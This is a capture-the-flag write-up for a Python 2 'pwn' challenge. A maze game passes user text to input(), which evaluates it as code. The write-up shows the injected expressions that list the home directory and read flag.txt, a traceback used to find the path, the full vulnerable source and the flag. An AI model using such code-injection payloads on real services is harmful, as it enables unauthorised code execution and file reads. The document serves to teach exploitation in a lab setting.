No Step On Snek
Category: Pwn
75 points
I heard you guys like python pwnables
nc umbccd.io 4000
Author: trashcanna
Solution
Under given address there was a snake looking game, which doesn’t seems to be working.
nc umbccd.io 4000
Welcome to the aMAZEing Maze
Your goal is to get from one side of the board to the other.
Your character is represented by "OO" and the finish will be "FF"
W/w - Move up!
A/a - Move left!
S/s - Move down!
D/d - Move right!
+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
|OO | | | |
+ +--+--+--+ + + +--+ +--+--+--+--+--+ + +
| | | | | | | | | |
+ + + + +--+--+--+--+--+ + +--+ + +--+ +
| | | | | | | |
+--+--+ + +--+--+--+--+--+--+ + +--+--+ + +
| | | | | | | |
+ +--+--+ + +--+--+ + +--+--+ +--+ + + +
| | | | | | | | | |
+ + +--+--+--+--+ + + + +--+--+ +--+--+ +
| | | | | | | |
+ +--+--+--+ +--+--+ + +--+ + +--+--+ + +
| | | | | | | | |
+ +--+ +--+--+ + +--+ + +--+ + + +--+--+
| | | | | | | | | | |
+--+--+ + + + +--+ +--+ + +--+--+--+--+ +
| | | | | | | |
+ +--+--+ +--+--+ +--+--+--+ +--+ +--+--+--+
| | | | | |
+--+ + +--+ + + +--+--+--+--+ +--+--+--+ +
| | | | | | | | |
+ +--+--+ + +--+--+--+ + +--+--+ +--+ + +
| | | | | | | |
+--+--+ + + + + +--+ +--+--+--+--+ +--+--+
| | | | | | | | |
+--+ +--+--+ +--+ + +--+--+ +--+ +--+--+ +
| | | | | | | |
+ +--+--+--+--+ + + +--+ +--+ +--+--+ + +
| | | | | | | | | |
+ + +--+--+ +--+--+--+ +--+ + + + + + +
| | | | |FF|
+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
After a while I’ve managed to RCE as below to get the flag.
Make your move: make_move(os.listdir('/home/challuser'))
['.bashrc', '.profile', '.bash_logout', 'nosteponsnek.py', 'flag.txt']
Make your move: make_move(open('flag.txt', 'rt').read())
DawgCTF{bUt_iT'5_c@ll3d_1nput}
Remark: I knew the /home/challuser
path from traceback after crashing the app (example below).
Make your move: crash ;-)
Traceback (most recent call last):
File "/home/challuser/nosteponsnek.py", line 73, in <module>
__main__()
File "/home/challuser/nosteponsnek.py", line 69, in __main__
still_playing = make_move(maze)
File "/home/challuser/nosteponsnek.py", line 27, in make_move
move = input("Make your move: ")
File "<string>", line 1
crash ;-)
^
SyntaxError: invalid syntax
I’ve also checked the source code from nosteponsnek.py
to understand why I got the flag this way ;-)
#!/usr/bin/env python2.7
from random import shuffle, randrange
import os
W = 1
w = 1
A = -9
a = -9
S = -1
s = -1
D = 9
d = 9
valid_moves = [W, w, A, a, S, s, D, d]
def welcome():
print "Welcome to the aMAZEing Maze"
print "Your goal is to get from one side of the board to the other."
print "Your character is represented by \"OO\" and the finish will be \"FF\""
print "W/w - Move up!"
print "A/a - Move left!"
print "S/s - Move down!"
print "D/d - Move right!"
def make_move(maze):
print maze
move = input("Make your move: ")
if move not in valid_moves:
raise NameError
# TODO: Move the player around the board
# Was a little cruched for time this year so I didn't feel like writing
# the gameplay. I hope that's okay :/
return True
def replace_last(s, replace_what, replace_with):
head, _sep, tail = s.rpartition(replace_what)
return head + replace_with + tail
# Randomly generate the gameboard and insert start/finish
def make_maze(w = 16, h = 16):
vis = [[0] * w + [1] for _ in range(h)] + [[1] * (w + 1)]
ver = [["| "] * w + ['|'] for _ in range(h)] + [[]]
hor = [["+--"] * w + ['+'] for _ in range(h + 1)]
def walk(x, y):
vis[y][x] = 1
d = [(x - 1, y), (x, y + 1), (x + 1, y), (x, y - 1)]
shuffle(d)
for (xx, yy) in d:
if vis[yy][xx]: continue
if xx == x: hor[max(y, yy)][x] = "+ "
if yy == y: ver[y][max(x, xx)] = " "
walk(xx, yy)
walk(randrange(w), randrange(h))
s = ""
for (a, b) in zip(hor, ver):
s += ''.join(a + ['\n'] + b + ['\n'])
s = s.replace(" ", "O", 2)
s = replace_last(s, " ", "FF")
return s
def __main__():
welcome()
still_playing = True
maze = make_maze()
while(still_playing):
still_playing = make_move(maze)
print "Congrats! You've finished the maze! Here's your flag:"
os.system("/bin/cat flag.txt")
__main__()
Flag
DawgCTF{bUt_iT'5_c@ll3d_1nput}